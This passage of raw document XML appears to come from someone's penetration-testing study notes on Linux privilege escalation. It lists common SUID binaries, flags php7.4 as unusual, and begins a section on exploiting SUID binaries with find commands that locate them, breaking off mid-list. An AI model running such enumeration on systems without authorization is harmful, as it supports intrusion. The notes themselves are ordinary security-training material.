        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Most of these are normal. Over time, you will start to memorize them. All of them are normal besides</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/bin/php7.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000208E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/bin/gpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000208F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/bin/mount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002090">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/bin/newgrp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/bin/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002092">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/bin/su</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002093">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/bin/sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002094">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/bin/umount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002095">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/lib/dbus-1.0/dbus-daemon-launch-helper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/lib/openssh/ssh-keysign</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002097">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/snapd/18596/usr/lib/snapd/snap-confine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002098">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/lib/dbus-1.0/dbus-daemon-launch-helper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002099">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/lib/eject/dmcrypt-get-device</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000209A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/lib/snapd/snap-confine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000209B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/lib/openssh/ssh-keysign</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000209C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/lib/policykit-1/polkit-agent-helper-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000209D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/chsh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000209E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/at</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000209F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/su</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/fusermount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/chfn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/umount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/newgrp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/mount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/gpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020AC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see a file with SUID bit set that belongs to a service (which is common), you can check version by running the binary along with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1727200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="209" name="image213.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image213.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId416"/>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0AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at this section of Linux Smart Enumeration for uncommon SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius SUID video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit Binaries with the SUID permission bit set:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID (Set User ID) is a special file permission in Linux and Unix systems that allows a file to be executed with the permissions of the file's owner, rather than the permissions of the user running it (usually root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3uuh6u7i1pa6" w:id="283"/>
      <w:bookmarkEnd w:id="283"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find SUID files/binaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1491"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm /4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1491"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/: Starts the search from the root directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1491"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-perm /4000: Finds files with the SUID permission bit set.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1491"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-type f: Searches only for files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1491"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2&gt;/dev/null: Suppresses error messages about inaccessible files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1491"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1491"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Almost the same as the previous command, so try both</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1491"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
